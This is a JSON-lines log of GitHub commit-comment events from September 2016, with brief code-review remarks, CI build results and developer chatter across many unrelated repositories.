{"id":"4516778645","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"StrelnikovVitaliy/Strelnikov"},"payload":{"comment":{"id":18899926,"position":8,"line":31,"path":"src/module03/homework/task1/Solution.java","commit_id":"c395cb66ca41b469e38f4dd9ea29aa0485e2b962","created_at":"2016-09-05T12:56:05Z","updated_at":"2016-09-05T12:56:05Z","body":"Чувак че за дела зачем тут 3 хуайема"}},"created_at":"2016-09-05T12:56:05Z"}
{"id":"4516782575","type":"CommitCommentEvent","actor":{"login":"bantuist"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18899940,"position":84,"line":84,"path":"scripts/album.js","commit_id":"75944ce6b7268f4fc400694c052d401484d80907","created_at":"2016-09-05T12:56:58Z","updated_at":"2016-09-05T12:56:58Z","body":"I realize that I should use albumImage here since I already selected the album-cover-art class.\r\n\r\nWhat is the difference between putting the event listener inside vs. outside the onload function?"}},"created_at":"2016-09-05T12:56:58Z"}
{"id":"4516791777","type":"CommitCommentEvent","actor":{"login":"marscher"},"repo":{"name":"markovmodel/PyEMMA"},"payload":{"comment":{"id":18899960,"position":null,"line":null,"path":null,"commit_id":"70e59400200e9066d93ebca189b247496476e3be","created_at":"2016-09-05T12:59:07Z","updated_at":"2016-09-05T12:59:07Z","body":"sorry, I should change this commit message, otherwise you will get another mail, when we finally merge this.\n"}},"created_at":"2016-09-05T12:59:07Z"}
{"id":"4516793523","type":"CommitCommentEvent","actor":{"login":"tomverran"},"repo":{"name":"guardian/members-data-api"},"payload":{"comment":{"id":18899962,"position":null,"line":null,"path":null,"commit_id":"e4a86445e8014e287bb9214e7d2116805e4b273e","created_at":"2016-09-05T12:59:28Z","updated_at":"2016-09-05T12:59:28Z","body":"I did not mean to push this to master 😱 "}},"created_at":"2016-09-05T12:59:28Z"}
{"id":"4516796392","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":18899970,"position":null,"line":null,"path":null,"commit_id":"e91e9ae212d847fbb798969bef74d2995c5a05dd","created_at":"2016-09-05T13:00:07Z","updated_at":"2016-09-05T13:00:07Z","body":"👍 "}},"created_at":"2016-09-05T13:00:07Z"}
{"id":"4516798667","type":"CommitCommentEvent","actor":{"login":"Tinche"},"repo":{"name":"hynek/attrs"},"payload":{"comment":{"id":18899976,"position":null,"line":null,"path":null,"commit_id":"a624035cec86a85a925ee4738b05748f2598035e","created_at":"2016-09-05T13:00:34Z","updated_at":"2016-09-05T13:00:34Z","body":"Ha, that was fast :)\r\n\r\nI was gonna add a frozen parameter to the Hypothesis machinery somewhere :p\r\n\r\nI'm at work atm so I can't really dig into this, but why do we even have a separate conversion step? I think we can do this better, like with validators. Basically generate code like this:\r\n\r\n```\r\ndef __init__(self, x, y, z):\r\n    _setattr(self, x, _convert_x(x))\r\n```\r\nfor every attribute with a converter."}},"created_at":"2016-09-05T13:00:34Z"}
{"id":"4516802817","type":"CommitCommentEvent","actor":{"login":"akva2"},"repo":{"name":"OPM/IFEM"},"payload":{"comment":{"id":18899982,"position":15,"line":1005,"path":"src/ASM/ASMbase.C","commit_id":"33941e67f6ffd1924123b2a747b8de1a634e3de3","created_at":"2016-09-05T13:01:30Z","updated_at":"2016-09-05T13:01:30Z","body":"8ccf9b9a6dd2571142046ac80945374da63b0d39"}},"created_at":"2016-09-05T13:01:30Z"}
{"id":"4516803094","type":"CommitCommentEvent","actor":{"login":"NitroxydeX"},"repo":{"name":"EternalBlueFlame/Traincraft-5"},"payload":{"comment":{"id":18899985,"position":1,"line":1,"path":"src/main/resources/assets/tc/models/supports_ballast.obj","commit_id":"e49dd0a3529c791da99542171419524561236db2","created_at":"2016-09-05T13:01:34Z","updated_at":"2016-09-05T13:01:34Z","body":"thanks to Cronos for fixing the flickering-glitch"}},"created_at":"2016-09-05T13:01:34Z"}
{"id":"4516803383","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18899986,"position":14,"line":1181,"path":"src/game/Spell.cpp","commit_id":"a1c1c23a950225631dcfd8a439affaf12e26815f","created_at":"2016-09-05T13:01:38Z","updated_at":"2016-09-05T13:01:38Z","body":"we were also removing stealth manually on some melee functionality thhroughout the core which might as well be removed since it is now being handled properly (on melee). I'll do it in a commit to show you what I mean.\r\n\r\nthe threat thing I will put on hold as I am not quite sure where it should be placed, but I think I have an idea.."}},"created_at":"2016-09-05T13:01:38Z"}
{"id":"4516806695","type":"CommitCommentEvent","actor":{"login":"KeitIG"},"repo":{"name":"KeitIG/museeks"},"payload":{"comment":{"id":18899991,"position":37,"line":37,"path":"src/js/utils/utils.js","commit_id":"a51edaca774e8bcbf89481980e9981808cb99fce","created_at":"2016-09-05T13:02:23Z","updated_at":"2016-09-05T13:02:23Z","body":"This commit is almost a year old. Utils will be rewritten soon anyway."}},"created_at":"2016-09-05T13:02:23Z"}
{"id":"4516811743","type":"CommitCommentEvent","actor":{"login":"hynek"},"repo":{"name":"hynek/attrs"},"payload":{"comment":{"id":18900002,"position":null,"line":null,"path":null,"commit_id":"a624035cec86a85a925ee4738b05748f2598035e","created_at":"2016-09-05T13:03:34Z","updated_at":"2016-09-05T13:03:34Z","body":"yeah I agree on the hypothesis machinery.  and dunno why the extra conversion step.  maybe __init__ wasn’t as nasty as now back then & the author didn’t want to mess it up too much?"}},"created_at":"2016-09-05T13:03:34Z"}
{"id":"4516817414","type":"CommitCommentEvent","actor":{"login":"deltaposter"},"repo":{"name":"ajin2/K-Tour"},"payload":{"comment":{"id":18900008,"position":5,"line":15,"path":"app/src/main/java/com/example/hanaj/k_tour/common/Tour/TourUTF8StringRequest.java","commit_id":"7c310ff203cf56471d3cf367ba3b619bf9029007","created_at":"2016-09-05T13:04:56Z","updated_at":"2016-09-05T13:04:56Z","body":"삭제하세요."}},"created_at":"2016-09-05T13:04:56Z"}
{"id":"4516818696","type":"CommitCommentEvent","actor":{"login":"Birajhow"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":18900012,"position":null,"line":null,"path":null,"commit_id":"ca82627719f9b89aa9e16f02ff2e711c9fd594c6","created_at":"2016-09-05T13:05:16Z","updated_at":"2016-09-05T13:05:16Z","body":"Atualizarei."}},"created_at":"2016-09-05T13:05:16Z"}
{"id":"4516819520","type":"CommitCommentEvent","actor":{"login":"ajin2"},"repo":{"name":"ajin2/K-Tour"},"payload":{"comment":{"id":18900014,"position":4,"line":35,"path":"app/src/main/java/com/example/hanaj/k_tour/common/Tour/TourListViewAdapter.java","commit_id":"7c310ff203cf56471d3cf367ba3b619bf9029007","created_at":"2016-09-05T13:05:27Z","updated_at":"2016-09-05T13:05:27Z","body":"got it"}},"created_at":"2016-09-05T13:05:27Z"}
{"id":"4516820776","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18900021,"position":null,"line":null,"path":null,"commit_id":"57382fd16535b27e4a6bb070fc3f1b9068aa352f","created_at":"2016-09-05T13:05:43Z","updated_at":"2016-09-05T13:05:43Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 921](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12563&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:11:11"}},"created_at":"2016-09-05T13:05:43Z"}
{"id":"4516824564","type":"CommitCommentEvent","actor":{"login":"Tinche"},"repo":{"name":"hynek/attrs"},"payload":{"comment":{"id":18900029,"position":null,"line":null,"path":null,"commit_id":"a624035cec86a85a925ee4738b05748f2598035e","created_at":"2016-09-05T13:06:36Z","updated_at":"2016-09-05T13:06:36Z","body":"It was a rhetorical question, no need to get snarky :p\r\n\r\nI can put together a PR soon-ish?"}},"created_at":"2016-09-05T13:06:36Z"}
{"id":"4516826000","type":"CommitCommentEvent","actor":{"login":"Lee-KangChen"},"repo":{"name":"Lee-KangChen/message_board"},"payload":{"comment":{"id":18900033,"position":null,"line":null,"path":null,"commit_id":"183ae7afc6e15e77b3b5135d374bc040693d2994","created_at":"2016-09-05T13:06:56Z","updated_at":"2016-09-05T13:06:56Z","body":"到這裡為止是oK的，但似乎還存在join table的migrate檔問題"}},"created_at":"2016-09-05T13:06:56Z"}
{"id":"4516826176","type":"CommitCommentEvent","actor":{"login":"rizka10"},"repo":{"name":"rizka10/discourse"},"payload":{"comment":{"id":18900034,"position":7,"line":7,"path":"plugins/discourse-details/config/locales/client.fi.yml","commit_id":"d18b54628fb78bb87a6c62c021d2f31df9f261f0","created_at":"2016-09-05T13:06:58Z","updated_at":"2016-09-05T13:06:58Z","body":"The indentation isn't quite right on the row 7. My bad, and I would fix it, but I don't know. The translations are good, though."}},"created_at":"2016-09-05T13:06:58Z"}
{"id":"4516826679","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18900036,"position":null,"line":null,"path":null,"commit_id":"c9f56148756586b43a73fd8a365bfc20a32cbff9","created_at":"2016-09-05T13:07:08Z","updated_at":"2016-09-05T13:07:08Z","body":"That went fast! GL for LTC!"}},"created_at":"2016-09-05T13:07:08Z"}
{"id":"4516829566","type":"CommitCommentEvent","actor":{"login":"SergeyZhukovsky"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18900041,"position":null,"line":null,"path":null,"commit_id":"56c583afc668b1eb7b5292028ea309d0bcf38775","created_at":"2016-09-05T13:07:46Z","updated_at":"2016-09-05T13:07:46Z","body":"++"}},"created_at":"2016-09-05T13:07:46Z"}
{"id":"4516830190","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18900044,"position":null,"line":null,"path":null,"commit_id":"1ba6af016889aa001a0cacc2ef9135631fd02920","created_at":"2016-09-05T13:07:55Z","updated_at":"2016-09-05T13:07:55Z","body":"ok. fine now."}},"created_at":"2016-09-05T13:07:55Z"}
{"id":"4516830953","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18900048,"position":null,"line":null,"path":null,"commit_id":"c9f56148756586b43a73fd8a365bfc20a32cbff9","created_at":"2016-09-05T13:08:07Z","updated_at":"2016-09-05T13:08:07Z","body":"This passed fast. Good luck to LTC.\r\n\r\nI would do LTC with sqrt(0,4) because this does only rearrange a condition."}},"created_at":"2016-09-05T13:08:07Z"}
{"id":"4516831019","type":"CommitCommentEvent","actor":{"login":"bethrezen"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":18900049,"position":58,"line":58,"path":"src/components/Order.php","commit_id":"b048cf1653ba52deb18e34a3e43a33ef8b23d88b","created_at":"2016-09-05T13:08:08Z","updated_at":"2016-09-05T13:08:08Z","body":"context_id is not needed in this condition"}},"created_at":"2016-09-05T13:08:08Z"}
{"id":"4516831267","type":"CommitCommentEvent","actor":{"login":"spaulaus"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":18900050,"position":null,"line":null,"path":null,"commit_id":"98bdc81186ca5dc7e73c4472e0a2bb8efb413f50","created_at":"2016-09-05T13:08:10Z","updated_at":"2016-09-05T13:08:10Z","body":"This commit has introduced an error when reaching the end of a file in batch mode. "}},"created_at":"2016-09-05T13:08:10Z"}
{"id":"4516831684","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18900052,"position":193,"line":null,"path":"Script/AtomicNET/AtomicNET/Core/NativeCore.cs","commit_id":"09c4b27b0716cc9a4970e674da4781b84a7d60da","created_at":"2016-09-05T13:08:16Z","updated_at":"2016-09-05T13:08:16Z","body":"For this and above, commented out because unused, but left in for @JoshEngebretson's future debugging sanity."}},"created_at":"2016-09-05T13:08:16Z"}
{"id":"4516831856","type":"CommitCommentEvent","actor":{"login":"Turing1887"},"repo":{"name":"SunnySunny93/Projekt1"},"payload":{"comment":{"id":18900053,"position":null,"line":null,"path":null,"commit_id":"6d13b592430556f76d6359ca4489573202cb6975","created_at":"2016-09-05T13:08:18Z","updated_at":"2016-09-05T13:08:18Z","body":"#### Tipp:\r\nDamit der php code ausgeführt wird müsste die Datei \"einstellungen.php\" heißen :smile: "}},"created_at":"2016-09-05T13:08:18Z"}
{"id":"4516834555","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"rperrot/openMVG"},"payload":{"comment":{"id":18900060,"position":241,"line":241,"path":"src/software/SfMWebGLViewer/openMVG_main_openMVG2WebGL.cpp","commit_id":"f7cdbf96f6b0ad2887bc39076357200c4b91da59","created_at":"2016-09-05T13:08:54Z","updated_at":"2016-09-05T13:08:54Z","body":"Why not create a tiny function, exportFileTo() & use this function on an array a filename?\r\nconst std::vector<std::string> vec_file_to_cpy = {\"index.html, \"style.css\", ...};\r\nfor (const std::string file_to_cpy_it : vec_file_to_cpy)\r\n  exportFileTo(outputPath, file_to_cpy_it);"}},"created_at":"2016-09-05T13:08:54Z"}
{"id":"4516839314","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18900068,"position":null,"line":null,"path":null,"commit_id":"c9f56148756586b43a73fd8a365bfc20a32cbff9","created_at":"2016-09-05T13:09:57Z","updated_at":"2016-09-05T13:09:57Z","body":"Good luck for LTC too!"}},"created_at":"2016-09-05T13:09:57Z"}
{"id":"4516840901","type":"CommitCommentEvent","actor":{"login":"idder10"},"repo":{"name":"RIEI/Releases"},"payload":{"comment":{"id":18900071,"position":null,"line":null,"path":null,"commit_id":"27eece447da7f3330cbf7a25ecd2c8b9a3f1c2d3","created_at":"2016-09-05T13:10:18Z","updated_at":"2016-09-05T13:10:18Z","body":"good\r\n"}},"created_at":"2016-09-05T13:10:18Z"}
{"id":"4516841083","type":"CommitCommentEvent","actor":{"login":"mrkkrp"},"repo":{"name":"mrkkrp/text-metrics"},"payload":{"comment":{"id":18900072,"position":10,"line":82,"path":"cbits/text_metrics.c","commit_id":"1670bd495bb28666231391ac044a401fdbecde87","created_at":"2016-09-05T13:10:20Z","updated_at":"2016-09-05T13:10:20Z","body":"@alexbiehl I have something to work on in the evening today, I guess."}},"created_at":"2016-09-05T13:10:20Z"}
{"id":"4516842023","type":"CommitCommentEvent","actor":{"login":"acogoluegnes"},"repo":{"name":"rabbitmq/rabbitmq-java-client"},"payload":{"comment":{"id":18900074,"position":4,"line":396,"path":"src/main/java/com/rabbitmq/client/impl/AMQConnection.java","commit_id":"98cfd3be41cd747d2fd7c21dd4c19ab7169a4121","created_at":"2016-09-05T13:10:32Z","updated_at":"2016-09-05T13:10:32Z","body":"Doh!"}},"created_at":"2016-09-05T13:10:32Z"}
{"id":"4516842679","type":"CommitCommentEvent","actor":{"login":"ksmith0"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":18900077,"position":null,"line":null,"path":null,"commit_id":"98bdc81186ca5dc7e73c4472e0a2bb8efb413f50","created_at":"2016-09-05T13:10:41Z","updated_at":"2016-09-05T13:10:41Z","body":"Above issue should have been resolved in dadd2895314b047aa876ad334993ab2a6f256441"}},"created_at":"2016-09-05T13:10:41Z"}
{"id":"4516844132","type":"CommitCommentEvent","actor":{"login":"ksmith0"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":18900087,"position":null,"line":null,"path":null,"commit_id":"dadd2895314b047aa876ad334993ab2a6f256441","created_at":"2016-09-05T13:11:01Z","updated_at":"2016-09-05T13:11:01Z","body":"This should have resolved issue noted in comment of commit 98bdc81186ca5dc7e73c4472e0a2bb8efb413f50."}},"created_at":"2016-09-05T13:11:01Z"}
{"id":"4516844287","type":"CommitCommentEvent","actor":{"login":"idder10"},"repo":{"name":"RIEI/Releases"},"payload":{"comment":{"id":18900089,"position":null,"line":null,"path":null,"commit_id":"27eece447da7f3330cbf7a25ecd2c8b9a3f1c2d3","created_at":"2016-09-05T13:11:04Z","updated_at":"2016-09-05T13:11:04Z","body":"nice\r\n"}},"created_at":"2016-09-05T13:11:04Z"}
{"id":"4516847985","type":"CommitCommentEvent","actor":{"login":"bethrezen"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":18900096,"position":14,"line":14,"path":"src/controllers/CartController.php","commit_id":"b048cf1653ba52deb18e34a3e43a33ef8b23d88b","created_at":"2016-09-05T13:11:54Z","updated_at":"2016-09-05T13:11:54Z","body":"As of retail website we does not have warehouseId, some simple logic needed as temporary solution"}},"created_at":"2016-09-05T13:11:54Z"}
{"id":"4516852359","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18900109,"position":null,"line":null,"path":null,"commit_id":"0e9834c484b235fcd4b759c9d6317d35bf02d164","created_at":"2016-09-05T13:12:56Z","updated_at":"2016-09-05T13:12:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 922](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12577&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-05T13:12:56Z"}
{"id":"4516858996","type":"CommitCommentEvent","actor":{"login":"rperrot"},"repo":{"name":"rperrot/openMVG"},"payload":{"comment":{"id":18900119,"position":241,"line":241,"path":"src/software/SfMWebGLViewer/openMVG_main_openMVG2WebGL.cpp","commit_id":"f7cdbf96f6b0ad2887bc39076357200c4b91da59","created_at":"2016-09-05T13:14:24Z","updated_at":"2016-09-05T13:14:24Z","body":"Yes that's a very good idea. \r\n\r\nAt the beginning I was not planing exporting so much files ... . But it may be mandatory to define a pair : \r\n( input_path , output_path) , because all import filenames are in the common/ directory and the output is a little bit different (script/, style/, model/). "}},"created_at":"2016-09-05T13:14:24Z"}
{"id":"4516860552","type":"CommitCommentEvent","actor":{"login":"bethrezen"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":18900123,"position":74,"line":94,"path":"src/models/order/Cart.php","commit_id":"b048cf1653ba52deb18e34a3e43a33ef8b23d88b","created_at":"2016-09-05T13:14:47Z","updated_at":"2016-09-05T13:14:47Z","body":"Don't forget to check quantity to be > 0 (rule in OrderItem should be ok)"}},"created_at":"2016-09-05T13:14:47Z"}
{"id":"4516863739","type":"CommitCommentEvent","actor":{"login":"bethrezen"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":18900127,"position":85,"line":105,"path":"src/models/order/Cart.php","commit_id":"b048cf1653ba52deb18e34a3e43a33ef8b23d88b","created_at":"2016-09-05T13:15:31Z","updated_at":"2016-09-05T13:15:31Z","body":"Item may not be in order"}},"created_at":"2016-09-05T13:15:31Z"}
{"id":"4516865388","type":"CommitCommentEvent","actor":{"login":"rawlingsj"},"repo":{"name":"rawlingsj/gofabric8"},"payload":{"comment":{"id":18900132,"position":94,"line":94,"path":"cmds/service.go","commit_id":"f39ac71176f143d567bd4cc702d084db690f2242","created_at":"2016-09-05T13:15:53Z","updated_at":"2016-09-05T13:15:53Z","body":"@jimmidyson is this enough to attribute code that I borrowed from minikube and slightly modified? "}},"created_at":"2016-09-05T13:15:53Z"}
{"id":"4516866531","type":"CommitCommentEvent","actor":{"login":"NITROXgermany"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18900135,"position":null,"line":null,"path":null,"commit_id":"59c2bc07670ac6453e0c785c1c70165fe283a988","created_at":"2016-09-05T13:16:06Z","updated_at":"2016-09-05T13:16:06Z","body":"Hi, Can you please tell me, how can i create pokestops and gym's?\r\nThanks :)\r\n"}},"created_at":"2016-09-05T13:16:06Z"}
{"id":"4516871492","type":"CommitCommentEvent","actor":{"login":"lujun9972"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18900143,"position":null,"line":null,"path":null,"commit_id":"bcf9f9abca0aa458ba018e0914112b4ec450ce82","created_at":"2016-09-05T13:17:17Z","updated_at":"2016-09-05T13:17:17Z","body":"In my emacs25, if the initial value is nil,then the first time I call org-preview-html-mode It will try to turn off preview on save,Doesn't it seems wired?\r\nIf I don't want to preview org file why I turn on org-preview-html-mode?"}},"created_at":"2016-09-05T13:17:17Z"}
{"id":"4516871538","type":"CommitCommentEvent","actor":{"login":"presnick"},"repo":{"name":"RunestoneInteractive/RunestoneServer"},"payload":{"comment":{"id":18900144,"position":null,"line":null,"path":null,"commit_id":"ee0061073a5e8edf4701b1e6f1d4624474e9b767","created_at":"2016-09-05T13:17:17Z","updated_at":"2016-09-05T13:17:17Z","body":"I'm going to revert this one. To be safe, we need a bigger fix. Will explain in my PR."}},"created_at":"2016-09-05T13:17:17Z"}
{"id":"4516872474","type":"CommitCommentEvent","actor":{"login":"dybiszb"},"repo":{"name":"dybiszb/BachelorThesis"},"payload":{"comment":{"id":18900146,"position":27,"line":24,"path":"src/application/atw_gui.cpp","commit_id":"4af8e056b2b7eba09501d379910dd0c6e702d68d","created_at":"2016-09-05T13:17:29Z","updated_at":"2016-09-05T13:17:29Z","body":"Thanks. I hope it is not ironic though ;p"}},"created_at":"2016-09-05T13:17:29Z"}
{"id":"4516873389","type":"CommitCommentEvent","actor":{"login":"EamonNerbonne"},"repo":{"name":"EamonNerbonne/ZlibWithDictionary"},"payload":{"comment":{"id":18900148,"position":null,"line":null,"path":null,"commit_id":"61b63209a66222ddb3ccbfb8159f276159001717","created_at":"2016-09-05T13:17:41Z","updated_at":"2016-09-05T13:17:41Z","body":"Released as https://www.nuget.org/packages/ZlibWithDictionary/2.1.1"}},"created_at":"2016-09-05T13:17:41Z"}
{"id":"4516875006","type":"CommitCommentEvent","actor":{"login":"igor90007"},"repo":{"name":"Urigo/meteor-angular2.0-socially"},"payload":{"comment":{"id":18900153,"position":12,"line":69,"path":"client/imports/parties/parties-upload.component.ts","commit_id":"5245aa3e2419a9df4b7df313852d80de2dd33afb","created_at":"2016-09-05T13:18:06Z","updated_at":"2016-09-05T13:18:06Z","body":"add \"this.thumbs=null;\" for refreshing part of layout"}},"created_at":"2016-09-05T13:18:06Z"}
{"id":"4516878629","type":"CommitCommentEvent","actor":{"login":"SunnySunny93"},"repo":{"name":"SunnySunny93/Projekt1"},"payload":{"comment":{"id":18900159,"position":null,"line":null,"path":null,"commit_id":"6d13b592430556f76d6359ca4489573202cb6975","created_at":"2016-09-05T13:18:53Z","updated_at":"2016-09-05T13:18:53Z","body":"Danke dir. Hat geklappt"}},"created_at":"2016-09-05T13:18:53Z"}
{"id":"4516878976","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":18900160,"position":8,"line":93,"path":"UM/Settings/Models/InstanceContainersModel.py","commit_id":"9150544411550fed16da90b21feeab1e1f84882e","created_at":"2016-09-05T13:18:57Z","updated_at":"2016-09-05T13:18:57Z","body":"Yes, the signal should be emit whenever the property changes value, even if the property is not actually read from QML at the moment. Not following the generic pattern for this will only lead to subtle bugs when the QML side changes.\r\n\r\nFor reference, the pattern I try to follow with these is:\r\n\r\n1. (If possible) Check if the value actually changed.\r\n2. If it has changed, perform any cleanup needed before changing the internal state. Most importantly, this means disconnecting signals.\r\n3. Assign the new value to the internal member.\r\n4. Perform any operations that need to be performed after the property value changes.\r\n5. Emit the property change signal.\r\n\r\nIt might be better to swap 4 and 5, but on the other hand the property change is not really finished until the post-change stuff is done."}},"created_at":"2016-09-05T13:18:57Z"}
{"id":"4516880369","type":"CommitCommentEvent","actor":{"login":"jmgarnier"},"repo":{"name":"bmorrall/dotfiles"},"payload":{"comment":{"id":18900163,"position":null,"line":null,"path":null,"commit_id":"9ebfaf088ccedb7949cb25137a707ba6f561a211","created_at":"2016-09-05T13:19:17Z","updated_at":"2016-09-05T13:19:17Z","body":"Thank you @geoffharcourt saved my day :)"}},"created_at":"2016-09-05T13:19:17Z"}
{"id":"4516882371","type":"CommitCommentEvent","actor":{"login":"Turing1887"},"repo":{"name":"SunnySunny93/Projekt1"},"payload":{"comment":{"id":18900166,"position":null,"line":null,"path":null,"commit_id":"6d13b592430556f76d6359ca4489573202cb6975","created_at":"2016-09-05T13:19:44Z","updated_at":"2016-09-05T13:19:44Z","body":"Dafür ist \"Gruppenarbeit\" doch da :wink: "}},"created_at":"2016-09-05T13:19:44Z"}
{"id":"4516885683","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18900171,"position":null,"line":null,"path":null,"commit_id":"0e9834c484b235fcd4b759c9d6317d35bf02d164","created_at":"2016-09-05T13:20:30Z","updated_at":"2016-09-05T13:20:30Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 922](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12577&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:07:34"}},"created_at":"2016-09-05T13:20:30Z"}
{"id":"4516886066","type":"CommitCommentEvent","actor":{"login":"bethrezen"},"repo":{"name":"DevGroup-ru/dotplant-currencies"},"payload":{"comment":{"id":18900172,"position":5,"line":5,"path":".idea/copyright/default.xml","commit_id":"5499759d533999c8b2590b5b75fdf47f9239f082","created_at":"2016-09-05T13:20:36Z","updated_at":"2016-09-05T13:20:36Z","body":"no idea plz"}},"created_at":"2016-09-05T13:20:36Z"}
{"id":"4516890509","type":"CommitCommentEvent","actor":{"login":"igor90007"},"repo":{"name":"Urigo/meteor-angular2.0-socially"},"payload":{"comment":{"id":18900187,"position":15,"line":52,"path":"client/imports/parties/parties-form.component.ts","commit_id":"3b464d16f526ab04ac2565e49e9710d7c0643560","created_at":"2016-09-05T13:21:37Z","updated_at":"2016-09-05T13:21:37Z","body":"add 'this.images=[];'"}},"created_at":"2016-09-05T13:21:37Z"}
{"id":"4516891090","type":"CommitCommentEvent","actor":{"login":"JsAaron"},"repo":{"name":"JsAaron/es6-magazine"},"payload":{"comment":{"id":18900188,"position":1,"line":1,"path":"README.md","commit_id":"4e156536052218bb300bd536db5cb4b8da748e87","created_at":"2016-09-05T13:21:45Z","updated_at":"2016-09-05T13:21:45Z","body":"1"}},"created_at":"2016-09-05T13:21:45Z"}
{"id":"4516892398","type":"CommitCommentEvent","actor":{"login":"NzV"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18900190,"position":null,"line":null,"path":null,"commit_id":"e172a246712c36a92a7d0a31509023d1ed382985","created_at":"2016-09-05T13:22:02Z","updated_at":"2016-09-05T13:22:02Z","body":"thx i will fix this"}},"created_at":"2016-09-05T13:22:02Z"}
{"id":"4516895503","type":"CommitCommentEvent","actor":{"login":"crunchyNYC"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18900198,"position":null,"line":null,"path":null,"commit_id":"c9f56148756586b43a73fd8a365bfc20a32cbff9","created_at":"2016-09-05T13:22:43Z","updated_at":"2016-09-05T13:22:43Z","body":"Excellent, good luck!"}},"created_at":"2016-09-05T13:22:43Z"}
{"id":"4516900997","type":"CommitCommentEvent","actor":{"login":"hynek"},"repo":{"name":"hynek/attrs"},"payload":{"comment":{"id":18900217,"position":null,"line":null,"path":null,"commit_id":"a624035cec86a85a925ee4738b05748f2598035e","created_at":"2016-09-05T13:23:53Z","updated_at":"2016-09-05T13:23:53Z","body":"heh, that wasn't even meant snarky.   just objectively calling a spade a spade #weAreAllGoingToHellForThis.  ;)"}},"created_at":"2016-09-05T13:23:53Z"}
{"id":"4516904981","type":"CommitCommentEvent","actor":{"login":"maxime-esa"},"repo":{"name":"esa/opengeode"},"payload":{"comment":{"id":18900227,"position":null,"line":null,"path":null,"commit_id":"c6923f7f5fe15c0363f7cf4addebbcbad6da5e2e","created_at":"2016-09-05T13:24:45Z","updated_at":"2016-09-05T13:24:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;TEUi2sdx&#x2F;290-update-completion-list-issue\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> update completion list issue</a>"}},"created_at":"2016-09-05T13:24:45Z"}
{"id":"4516905489","type":"CommitCommentEvent","actor":{"login":"warrenbuckley"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18900229,"position":null,"line":null,"path":null,"commit_id":"24c9389e2eb53dd7fc7fc3112676f203cd8788f8","created_at":"2016-09-05T13:24:51Z","updated_at":"2016-09-05T13:24:51Z","body":"Unable to test fully due to our.umb local environment issues. Code changes above though look fine."}},"created_at":"2016-09-05T13:24:51Z"}
{"id":"4516905614","type":"CommitCommentEvent","actor":{"login":"heikkil"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18900230,"position":null,"line":null,"path":null,"commit_id":"bcf9f9abca0aa458ba018e0914112b4ec450ce82","created_at":"2016-09-05T13:24:53Z","updated_at":"2016-09-05T13:24:53Z","body":"In my pull request code, initial value was nil and nothing visible happened when I required the package and added the hook. To see the preview of an org file, I tuned on the mode.\r\n\r\nI can investigate later how the behaviour has changed in the latest code."}},"created_at":"2016-09-05T13:24:53Z"}
{"id":"4516913399","type":"CommitCommentEvent","actor":{"login":"vvim"},"repo":{"name":"vvim/BT_deelnemers"},"payload":{"comment":{"id":18900243,"position":null,"line":null,"path":null,"commit_id":"9d06a5736438e9abddaafa4a14def1209a08b017","created_at":"2016-09-05T13:26:39Z","updated_at":"2016-09-05T13:26:39Z","body":"for version history, see #8 "}},"created_at":"2016-09-05T13:26:39Z"}
